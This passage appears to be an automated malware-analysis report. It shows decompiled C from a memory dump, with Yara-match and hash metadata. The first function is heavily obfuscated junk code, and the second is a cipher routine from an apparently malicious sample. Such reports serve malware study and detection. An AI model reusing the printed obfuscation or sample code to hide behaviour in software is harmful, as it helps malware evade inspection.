                                    				 *0xb091fbf7 = _t104;
                                    				asm("ror dword [0xadf26139], 0x6d");
                                    				_pop( *0xb04becf);
                                    				asm("adc [0x231874f3], edx");
                                    				_t74 = (__ecx & 0x000000b2) -  *0xb3a40b30;
                                    				_pop( *0xf32a96d3);
                                    				 *0x2c0a89d7 = __ebx - 0x1b3e656f;
                                    				_t55 = __eax ^ 0x0f4867e9 ^  *0xd6a31630;
                                    				 *0xbcea4863 = _t74;
                                    				asm("sbb [0x64925e64], esi");
                                    				 *0xa906906 =  *0xa906906 << 0x52;
                                    				_push( *0x2c0a89d7);
                                    				 *0xec1cfe0d =  *0xec1cfe0d + _t55;
                                    				 *0xd60dbadb =  *0xd60dbadb << 0xb0;
                                    				_t80 = 0x6e901905;
                                    				_pop(_t96);
                                    				 *0x8c122b10 =  *0x8c122b10 << 0xcb;
                                    				_pop( *0x3873a697);
                                    				asm("rol byte [0xfdd7ce18], 0xf");
                                    				asm("cmpsw");
                                    				_t56 = _t55 ^  *0xe90e3add;
                                    				_t68 = 0xe14c998f +  *0xa742a36b * 0xe3f9;
                                    				_t75 = _t74 + 0xb3;
                                    				asm("cmpsb");
                                    				 *0x25658cf8 = _t101;
                                    				_pop(_t105);
                                    				if(_t75 < 0) {
                                    					L1:
                                    					 *0x3b97609 =  *0x3b97609 & _t105;
                                    					_t80 = _t80 & 0x000000b2;
                                    				} else {
                                    					__ebp = 0x29109978;
                                    					asm("sbb [0x1a6d70f7], ebp");
                                    					asm("ror dword [0x92fab492], 0x14");
                                    					 *0x9696412c =  *0x9696412c | __cl;
                                    					__ah = __ah +  *0x9e18d4b7;
                                    					asm("adc ebx, [0xb835b42b]");
                                    					 *0xb63d4f9b =  *0xb63d4f9b & __esp;
                                    					__esp =  *0x777339bd;
                                    					asm("sbb ah, 0x14");
                                    					__ecx =  *0x4168a16a * 0xb568;
                                    					 *0x8e592e0e =  *0x8e592e0e ^ __edi;
                                    					 *0x2a95fe3f = 0x6e901905;
                                    					asm("ror dword [0x25658d0b], 0xc3");
                                    					__esp = __ecx;
                                    					if( *0x8e592e0e < 0) {
                                    						goto L1;
                                    					} else {
                                    						__ecx = __ecx - 0x9e159978;
                                    						__bl = __bl + 0xd0;
                                    						__edx = __edx ^  *0x4656aeff;
                                    						__esi = __esi & 0x77d7b1ce;
                                    						__ch =  *0xb4c5a43c;
                                    						 *0x1b0a4034 =  *0x1b0a4034 >> 0x7e;
                                    						 *0x4513989 =  *0x4513989 ^ 0x6e901905;
                                    						 *0x282f8199 =  *0x282f8199 ^ __edi;
                                    						 *0xab65ddbe =  *0xab65ddbe | __ebx;
                                    						asm("rcr byte [0xff5a3ba0], 0xcf");
                                    						asm("stosb");
                                    						_push( *0x6a6b7797);
                                    						__ch =  *0xb4c5a43c |  *0x4d168ab0;
                                    						__ecx = __ecx -  *0xe34d1364;
                                    						if(__ecx >= 0) {
                                    							goto L1;
                                    						} else {
                                    							 *0x66e1f973 =  *0x66e1f973 & __eax;
                                    							asm("sbb [0x97d2fd85], ebx");
                                    							__eax = __eax + 1;
                                    							 *0x1cf10184 =  *0x1cf10184 << 0x90;
                                    							__esi = __esi & 0xbadb4aec;
                                    							 *0x5059931a =  *0x5059931a - __ah;
                                    							__edx = 0x1cca2ec5;
                                    							 *0xf3daf564 =  *0xf3daf564 << 0x2b;
                                    							 *0x98e67a8f =  *0x98e67a8f << 0x68;
                                    							__esp = 0x560a54d6;
                                    							__ebp = 0x1d1f7d71;
                                    							__edx =  *0xe34f9fa3;
                                    							__ebx = __ebx +  *0xc72b3c4;
                                    							asm("adc ebp, [0xf00d302d]");
                                    							asm("sbb [0x276bb097], esi");
                                    							_t24 = __edi;
                                    							__edi =  *0x93d1d529;
                                    							 *0x93d1d529 = _t24;
                                    							__eax = __ecx;
                                    							__ch = 0x14;
                                    							asm("adc edx, 0x702bebb9");
                                    							__esp = 0x560a54d6 -  *0x341ea30f;
                                    							__ch = 0x00000014 ^  *0xe92d1b30;
                                    							__edi =  *0x3b51a801;
                                    							__ebp = 0x5324dcdf;
                                    							asm("sbb ebp, 0x26005e64");
                                    							if(0x14 > 0) {
                                    								goto L1;
                                    							} else {
                                    								__ebx =  *0xa130347f * 0x662a;
                                    								__ch = __ch |  *0x6b779cb1;
                                    								__edx =  *0x188ab06a * 0xda1d;
                                    								_push(__edi);
                                    								 *0x9d463fe5 =  *0x9d463fe5 << 0xc1;
                                    								__edi = __edi -  *0x93a19f95;
                                    								 *0x7c753036 =  *0x7c753036 + __ebx;
                                    								if( *0x7c753036 < 0) {
                                    									goto L1;
                                    								} else {
                                    									 *0xb5624f72 =  *0xb5624f72 ^ __edi;
                                    									asm("adc [0xf8d8b3b7], dl");
                                    									_pop( *0x906ddd0b);
                                    									 *0xf55648c =  *0xf55648c << 6;
                                    									__ebx = 0x30341ea3 + __ebx;
                                    									asm("sbb [0x33946310], bl");
                                    									__ecx = __ecx +  *0xe2bc6a8e;
                                    									asm("adc [0xf1d90a62], edi");
                                    									_push(__ebx);
                                    									 *0xd4c3ad80 = 0x14;
                                    									asm("adc esp, [0xac95d813]");
                                    									__ebp =  *0x67cd016b * 0x5345;
                                    									__edi = __edi &  *0x2d08a4ea;
                                    									__esi = __esi - 1;
                                    									__al = __al | 0x000000b6;
                                    									__edx = __edx &  *0xfc4a7e19;
                                    									_t29 = __ebx;
                                    									__ebx =  *0xe241b929;
                                    									 *0xe241b929 = _t29;
                                    									asm("sbb bh, [0xf08473f2]");
                                    									asm("sbb cl, [0x630e54b3]");
                                    									__ecx = __ecx - 0x91ef988c;
                                    									if(__ecx < 0) {
                                    										goto L1;
                                    									} else {
                                    										__ebp =  *0xa411587c * 0x5743;
                                    										 *0xd7cf0f18 =  *0xd7cf0f18 >> 0x77;
                                    										_push( *0xd7d170d9);
                                    										asm("adc edx, 0xe8c8f436");
                                    										_push(__esp);
                                    										asm("adc esi, 0x4c25e031");
                                    										 *0x63472704 =  *0x63472704 ^ __ah;
                                    										_push( *0xf8d032b9);
                                    										__ebp =  *0xa411587c * 0x5743 - 0x3d45b30b;
                                    										asm("adc edi, 0xf4479ed");
                                    										asm("rcl dword [0x30341ea3], 0xdf");
                                    										__bh = __bh ^ 0x00000018;
                                    										_push(__esp);
                                    										asm("adc esi, 0xa3132a09");
                                    										if(__bh != 0) {
                                    											goto L1;
                                    										} else {
                                    											_push( *0x7cdc707b);
                                    											asm("sbb eax, [0xf9be5d27]");
                                    											asm("rol byte [0xea11e0c6], 0xbe");
                                    											 *0xff8e1c9 = __dl;
                                    											 *0x830975b1 =  *0x830975b1 + __al;
                                    											asm("lodsd");
                                    											asm("movsb");
                                    											__cl = __cl &  *0x62b80e3c;
                                    											 *0x89ee220c =  *0x89ee220c << 0xa5;
                                    											__esi = __esi &  *0x82df5fbd;
                                    											__ch = __ch -  *0xb588ca8;
                                    											asm("sbb [0xc9b018d7], cl");
                                    											__ah = __ah -  *0xec94aef2;
                                    											 *0xa910a4ec =  *0xa910a4ec << 0xf5;
                                    											asm("ror dword [0xddc227ed], 0x69");
                                    											__edi = __edi + 1;
                                    											__dl = __dl -  *0xd032b963;
                                    											 *0x8ae216f8 =  *0x8ae216f8 << 0x80;
                                    											__esi = __esi - 0xfca72f13;
                                    											asm("scasb");
                                    											 *0x9c5027fe =  *0x9c5027fe << 0x44;
                                    											asm("sbb [0x17811c8a], bh");
                                    											__edi = __edi ^ 0x11bae76c;
                                    											 *0x2333afca =  *0x2333afca << 0xd1;
                                    											__esp = __esp | 0x814dceb8;
                                    											__ebx = __ebx;
                                    											_push(__edx);
                                    											asm("movsw");
                                    											if(( *0xb30f04c1 & __ecx) != 0) {
                                    												goto L1;
                                    											} else {
                                    												__esi =  *0xcdf1f97b;
                                    												__ecx =  *0xe3ca431;
                                    												 *0x181862b8 =  *0x181862b8 | __eax;
                                    												_pop( *0x58de3926);
                                    												asm("rol dword [0xfc883437], 0xf6");
                                    												__eax = __eax ^  *0x42989a9d;
                                    												__ebx = __ebx |  *0x6fb04136;
                                    												asm("adc dl, 0xb3");
                                    												_pop(__eax);
                                    												 *0x9225eaa1 =  *0x9225eaa1 << 0xdf;
                                    												asm("sbb ebx, [0x1d2b030d]");
                                    												asm("rcl dword [0xfb0b773b], 0xd7");
                                    												asm("rcl dword [0x515dc7cb], 0x77");
                                    												__eax = __eax + 0x2f47e0dd;
                                    												 *0xcd9753d9 =  *0xcd9753d9 >> 0xab;
                                    												 *0xbf8cf186 =  *0xbf8cf186 << 0x52;
                                    												__bl = __bl - 0x32;
                                    												asm("rol byte [0x8bf18f3c], 0xb4");
                                    												__edx =  *0xeb76630f;
                                    												__edi = __edi -  *0xa4c29a9b;
                                    												asm("sbb dh, 0x3c");
                                    												asm("adc ebp, [0xc62b80e]");
                                    												__eax = __eax -  *0xbe3684d6;
                                    												asm("cmpsw");
                                    												__eax = __eax |  *0x8ca89323;
                                    												_pop(__eax);
                                    												__esp = __esp -  *0x2615d70b;
                                    												_push(__eax);
                                    												__ebp = __ebp - 1;
                                    												 *0x404156c6 =  *0x404156c6 & __bl;
                                    												__edi = __edi & 0xff8459a9;
                                    												asm("adc ebx, 0x2c1469c7");
                                    												__esi =  *0x341de623;
                                    												__eax = __eax + 1;
                                    												__bl = __bl &  *0xc3a1120a;
                                    												 *0x45dc323c =  *0x45dc323c + __ch;
                                    												__esi =  *0x341de623 + 1;
                                    												asm("lodsd");
                                    												_push(__esp);
                                    												asm("cmpsw");
                                    												__ch = 0xf9;
                                    												__dl = __dl & 0x000000e3;
                                    												__edi = __edi - 0xda133add;
                                    												asm("adc ecx, [0x6babb795]");
                                    												__ecx =  *0xe3ca431 + 1;
                                    												 *0x847f8dd5 =  *0x847f8dd5 >> 0xe5;
                                    												if( *0x847f8dd5 != 0) {
                                    													goto L1;
                                    												} else {
                                    													__esp = __esp -  *0x55346275;
                                    													asm("sbb edi, [0x60400f81]");
                                    													_push( *0xacc6468f);
                                    													asm("movsb");
                                    													__eax = __eax -  *0xfc4a170f;
                                    													__edx = __edx + 0x2eba62d;
                                    													asm("rol byte [0xa4c49e86], 0xe7");
                                    													asm("rcl byte [0x62b80e3c], 0x23");
                                    													__eax = __eax |  *0xa5a58f0d;
                                    													asm("rcl byte [0xccc8d030], 0xe1");
                                    													__ecx = __ecx - 0x435ef32f;
                                    													__bl = __bl &  *0xae0f2b10;
                                    													__edx = __edx & 0xcc5ee3d3;
                                    													asm("lodsb");
                                    													_pop(__edx);
                                    													__edi = __edi - 1;
                                    													__eax = __eax &  *0x9f5cbaea;
                                    													asm("adc [0xa4f0f89a], edx");
                                    													_pop(__esp);
                                    													__ebx = __ebx + 1;
                                    													 *0xe647d5d9 =  *0xe647d5d9 << 0xc7;
                                    													 *0x75ceabf5 =  *0x75ceabf5 >> 0x35;
                                    													asm("movsb");
                                    													__bh = __bh | 0x000000b7;
                                    													__ebx = __ebx &  *0xab6890a3;
                                    													L1();
                                    													_push( *0x19eccefe);
                                    													asm("stosb");
                                    													__edi = __edi | 0xf116aa1e;
                                    													_pop( *0xb216ca0f);
                                    													_pop( *0x316a1809);
                                    													__ecx = 0xf8713ffe;
                                    													__edx = __edx &  *0xff1b711b;
                                    													__cl = __cl &  *0xdb4aec1c;
                                    													__eax = __eax &  *0x1c5915ba;
                                    													__esp = __esp &  *0x941847d9;
                                    													 *0xff145d0 =  *0xff145d0 ^ __cl;
                                    													__edi = 0x1de678d6;
                                    													__bh =  *0xe0a4034;
                                    													__ecx = 0x58411a0a;
                                    													__esi = 0xf8713ffe;
                                    													_pop(__esp);
                                    													if(( *0x25658bdd & 0x560a54d6) < 0) {
                                    														goto L1;
                                    														do {
                                    															do {
                                    																do {
                                    																	do {
                                    																		do {
                                    																			goto L1;
                                    																		} while (_t80 != 0);
                                    																		_pop(_t90);
                                    																		 *0x9b43710d =  *0x9b43710d >> 0x59;
                                    																		_t96 = (_t96 & 0xec6820a1) +  *0x8dca0c2b + 1;
                                    																		asm("ror dword [0xaa6cd8fc], 0x15");
                                    																		 *0x74f8a804 =  *0x74f8a804 & _t68;
                                    																		 *0x5b0f1f05 = _t68;
                                    																		asm("adc ecx, 0x8c0ee43d");
                                    																		 *0x2bfa1939 = _t101;
                                    																		 *0xed478613 = _t80 &  *0x3e5484fc & 0x610dd78c;
                                    																		_t75 = _t75 ^ 0xb71d1f16 |  *0x951ec62f;
                                    																		 *0xfa5521d2 =  *0xfa5521d2 << 0xea;
                                    																		_t56 = _t56 + 2 &  *0x10814be3;
                                    																		asm("sbb [0xf9062aa2], bl");
                                    																		asm("adc bh, [0x41608722]");
                                    																		_t105 = 0x7c387416;
                                    																		 *0x809b9ef =  *0xed478613;
                                    																		asm("adc esp, [0xf6102665]");
                                    																		_t80 = _t90;
                                    																		 *0x8ebbace3 =  *0x8ebbace3 << 0xae;
                                    																		 *0x70a50ad7 =  *0x70a50ad7 - _t80;
                                    																		_push(_t90 + 1);
                                    																		_t68 =  *0x5b0f1f05 - 0x0000000a ^  *0x906b64d2;
                                    																		_t101 =  *0xab99e09;
                                    																		 *0xab99e09 =  *0x2bfa1939;
                                    																	} while (_t68 >= 0);
                                    																	 *0xb99f09b7 =  *0xb99f09b7 ^ _t68;
                                    																	asm("adc eax, [0xf7196c7]");
                                    																	 *0x1262affc =  *0x1262affc >> 0xdc;
                                    																	_t75 = _t75 -  *0x1c4badca;
                                    																	asm("rcr dword [0x92772366], 0x3f");
                                    																	_t80 = 0x7c387416;
                                    																	asm("rcr dword [0xd5227b61], 0x58");
                                    																	_t56 =  *0xfd3b2b3a;
                                    																	 *0xfd3b2b3a =  *0x6254f17d * 0x00009f21 |  *0x337b9033;
                                    																} while (_t75 >= 0);
                                    																asm("rol byte [0x4c68f784], 0x8d");
                                    																_pop(_t56);
                                    																 *0x206342b0 =  *0x206342b0 << 0x5c;
                                    																asm("rcr byte [0x4eac7ee7], 0x86");
                                    																_t68 =  *0x91e576a * 0xa901;
                                    																_push(0x2f663016);
                                    																_t80 =  *0x5f48636b * 0x00005555 &  *0x74c95ceb;
                                    																asm("sbb ebx, [0x31369c6e]");
                                    																_t105 = (0x7c387416 &  *0xee2a260f) +  *0x50472a93;
                                    																_t96 = _t96 - 1;
                                    															} while (_t96 != 0);
                                    															asm("adc esi, [0xcdd02e7a]");
                                    															_t56 = _t56 + 0x347ded17;
                                    														} while (0x2f663016 != 0);
                                    														 *0x9048b5dd =  *0x9048b5dd >> 0x4e;
                                    														 *0xb06d5ff4 =  *0xb06d5ff4 | _t68;
                                    														 *0x591ac92e =  *0x591ac92e << 0xcc;
                                    														 *0x95d3f14 = _t80;
                                    														asm("lodsb");
                                    														 *0xfd7e63c6 =  *0xfd7e63c6 | _t56;
                                    														 *0xb5e49981 =  *0xb5e49981 + _t96 - 0x520b7c0f;
                                    														asm("sbb [0xe8fcc704], ah");
                                    														return _t56 - 0x8016fbf1;
                                    													} else {
                                    														__edi = 0x1de678d6 |  *0xb5069978;
                                    														asm("sbb ebp, 0x9f0ad713");
                                    														__al = __al | 0x00000076;
                                    														return __eax;
                                    													}
                                    												}
                                    											}
                                    										}
                                    									}
                                    								}
                                    							}
                                    						}
                                    					}
                                    				}
                                    			}














                                    0x0041d047
                                    0x0041d04d
                                    0x0041d053
                                    0x0041d059
                                    0x0041d05f
                                    0x0041d066
                                    0x0041d06d
                                    0x0041d073
                                    0x0041d074
                                    0x0041d07a
                                    0x0041d07a
                                    0x0041d07a
                                    0x0041d090
                                    0x0041d09c
                                    0x0041d0a9
                                    0x0041d0b6
                                    0x0041d0bc
                                    0x0041d0c3
                                    0x0041d0c4
                                    0x0041d0cb
                                    0x0041d0cb
                                    0x0041d0cb
                                    0x0041d0f8
                                    0x0041d0ff
                                    0x0041d106
                                    0x0041d10d
                                    0x0041d11a
                                    0x0041d124
                                    0x0041d125
                                    0x0041d12b
                                    0x0041d131
                                    0x0041d137
                                    0x0041d137
                                    0x0041d13e
                                    0x0041d144
                                    0x0041d144
                                    0x0041d155
                                    0x0041d163
                                    0x0041d169
                                    0x0041d170
                                    0x0041d191
                                    0x0041d192
                                    0x0041d198
                                    0x0041d19e
                                    0x0041d1a9
                                    0x0041dfab
                                    0x0041dfab
                                    0x0041dfb1
                                    0x0041dfb7
                                    0x0041dfb9
                                    0x0041dfb9
                                    0x0041dfa5
                                    0x0041dea9
                                    0x0041dda4
                                    0x0041dcec
                                    0x0041dc99
                                    0x0041dc1e
                                    0x0041dbe7
                                    0x0041db4c
                                    0x0041daec

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.765614509.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: +A!
                                    • API String ID: 0-3827699015
                                    • Opcode ID: b205966ad98cd51c897a829381ed5bd6fd86f4d0e85aad6ce265eab5c9c0417a
                                    • Instruction ID: c16755352ad79140925b52736a6c4c9e12d15fb35e7eeb1209927fe1734159d6
                                    • Opcode Fuzzy Hash: b205966ad98cd51c897a829381ed5bd6fd86f4d0e85aad6ce265eab5c9c0417a
                                    • Instruction Fuzzy Hash: B6126432919781CFD712DF38DD8AB423FB2F382320748464ED9A197592D734216ACF88
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.765614509.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: m6t~
                                    • API String ID: 0-872450345
                                    • Opcode ID: 9fe6a4f8be3beb5c6f3446592b86f21b079c927220d83f2e8e2b9c7022c8fcde
                                    • Instruction ID: a3be2bff907c6d5f62aaddc72bf6df83a54b918b609c01eaeb3f3ebaf8aa5bcb
                                    • Opcode Fuzzy Hash: 9fe6a4f8be3beb5c6f3446592b86f21b079c927220d83f2e8e2b9c7022c8fcde
                                    • Instruction Fuzzy Hash: DFC08027E4A14C15D511494C78403F9F378DB43175E2036CBDC04B75644443D451018D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 26%
                                    			E00402FB0(void* __eax, signed int* __ecx, signed int* __edx, signed int _a4, signed int* _a8) {
                                    				signed int _v8;
                                    				signed int _v12;
                                    				signed int _v16;
                                    				signed int _v20;
                                    				signed int _v24;
                                    				void* _t273;
                                    				signed int _t274;
                                    				signed int _t282;
                                    				signed int* _t358;
                                    				signed int _t383;
                                    				signed int* _t409;
                                    				signed int _t429;
                                    				signed int _t458;
                                    				signed int _t478;
                                    				signed int _t560;
                                    				signed int _t603;
                                    
                                    				_t273 = __eax;
                                    				asm("ror edi, 0x8");
                                    				asm("rol edx, 0x8");
                                    				_t458 = ( *__edx & 0xff00ff00 |  *__edx & 0x00ff00ff) ^  *__ecx;
                                    				asm("ror ebx, 0x8");
                                    				asm("rol edx, 0x8");
                                    				_v20 = _t458;
                                    				_v8 = (__edx[1] & 0xff00ff00 | __edx[1] & 0x00ff00ff) ^ __ecx[1];
                                    				asm("ror ebx, 0x8");
                                    				asm("rol edx, 0x8");
                                    				_t282 = (__edx[2] & 0xff00ff00 | __edx[2] & 0x00ff00ff) ^ __ecx[2];
                                    				asm("ror esi, 0x8");
                                    				asm("rol edx, 0x8");
                                    				_v12 = (__edx[3] & 0xff00ff00 | __edx[3] & 0x00ff00ff) ^ __ecx[3];
                                    				asm("ror edx, 0x10");
                                    				asm("ror esi, 0x8");
                                    				asm("rol esi, 0x8");
                                    				_v24 = _t282;
                                    				_t429 =  *(__eax + 4 + (_t282 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t458 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[4];
                                    				asm("ror esi, 0x10");
                                    				asm("ror ebx, 0x8");
                                    				asm("rol ebx, 0x8");
                                    				_t603 =  *(__eax + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t282 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t458 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[5];
                                    				asm("ror ebx, 0x8");
                                    				asm("ror edi, 0x10");
                                    				asm("rol edi, 0x8");
                                    				_v16 =  *(__eax + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t458 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[6];
                                    				asm("ror edi, 0x10");
                                    				asm("ror ebx, 0x8");
                                    				asm("rol ebx, 0x8");
                                    				_t409 =  &(__ecx[8]);
                                    				_v12 =  *(__eax + 4 + (_v8 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^  *(_t409 - 4);
                                    				_t478 = (_a4 >> 1) - 1;
                                    				_a4 = _t478;
                                    				if(_t478 != 0) {
                                    					do {
                                    						asm("ror edi, 0x10");
                                    						asm("ror ebx, 0x8");
                                    						asm("rol ebx, 0x8");
                                    						_v20 =  *(__eax + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t603 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 >> 0x00000018 & 0x000000ff) * 4) ^  *_t409;
                                    						asm("ror edi, 0x10");
                                    						asm("ror ebx, 0x8");
                                    						asm("rol ebx, 0x8");
                                    						_v8 =  *(__eax + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t603 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[1];
                                    						asm("ror ebx, 0x8");
                                    						asm("ror edi, 0x10");
                                    						asm("rol edi, 0x8");
                                    						_t383 =  *(__eax + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t603 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[2];
                                    						asm("ror edi, 0x10");
                                    						asm("ror edx, 0x8");
                                    						asm("rol edx, 0x8");
                                    						_v24 = _t383;
                                    						_t560 =  *(__eax + 4 + (_t603 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[3];
                                    						asm("ror edx, 0x10");
                                    						asm("ror esi, 0x8");
                                    						asm("rol esi, 0x8");
                                    						_t429 =  *(__eax + 4 + (_t383 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t560 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[4];
                                    						asm("ror esi, 0x10");
                                    						asm("ror ebx, 0x8");
                                    						asm("rol ebx, 0x8");
                                    						_t603 =  *(__eax + 4 + (_t560 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t383 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[5];
                                    						_v12 = _t560;
                                    						asm("ror edi, 0x8");
                                    						asm("ror ebx, 0x10");
                                    						asm("rol ebx, 0x8");
                                    						_v16 =  *(__eax + 4 + (_t560 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[6];
                                    						asm("ror ebx, 0x10");
                                    						asm("ror edi, 0x8");
                                    						asm("rol edi, 0x8");
                                    						_t409 =  &(_t409[8]);
                                    						_t205 =  &_a4;
                                    						 *_t205 = _a4 - 1;
                                    						_v12 =  *(__eax + 4 + (_v8 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^  *(_t409 - 4);
                                    					} while ( *_t205 != 0);
                                    				}
                                    				asm("ror ebx, 0x8");
                                    				asm("rol edi, 0x8");
                                    				 *_a8 = (( *(_t273 + 4 + (_t429 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t603 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_v12 & 0x000000ff) * 4) & 0x000000ff ^  *_t409) & 0xff00ff00 | (( *(_t273 + 4 + (_t429 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t603 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_v12 & 0x000000ff) * 4) & 0x000000ff ^  *_t409) & 0x00ff00ff;
                                    				asm("ror ebx, 0x8");
                                    				asm("rol edi, 0x8");
                                    				_a8[1] = (( *(_t273 + 4 + (_t603 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t429 & 0x000000ff) * 4) & 0x000000ff ^ _t409[1]) & 0xff00ff00 | (( *(_t273 + 4 + (_t603 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t429 & 0x000000ff) * 4) & 0x000000ff ^ _t409[1]) & 0x00ff00ff;
                                    				asm("ror ebx, 0x8");
                                    				asm("rol edi, 0x8");
                                    				_t358 = _a8;
                                    				_t358[2] = (( *(_t273 + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t429 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t603 & 0x000000ff) * 4) & 0x000000ff ^ _t409[2]) & 0xff00ff00 | (( *(_t273 + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t429 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t603 & 0x000000ff) * 4) & 0x000000ff ^ _t409[2]) & 0x00ff00ff;
                                    				_t274 =  *(_t273 + 5 + (_v16 & 0x000000ff) * 4) & 0x000000ff;
                                    				asm("ror ecx, 0x8");
                                    				asm("rol edi, 0x8");
                                    				_t358[3] = (( *(_t273 + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t429 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t603 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^ _t274 ^ _t409[3]) & 0xff00ff00 | (( *(_t273 + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t429 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t603 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^ _t274 ^ _t409[3]) & 0x00ff00ff;
                                    				return _t274;
                                    			}

                                    Memory Dump Source
                                    • Source File: 00000007.00000002.765614509.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                                    • Instruction ID: 3a980b568be2ae1ecdc62ef5b70c599cea3cbb84bd4cfa04f309e58bee3fdca8
                                    • Opcode Fuzzy Hash: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                                    • Instruction Fuzzy Hash: 37026E73E547164FE720CE4ACDC4725B3A3EFC8301F5B81B8CA142B613CA39BA525A90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

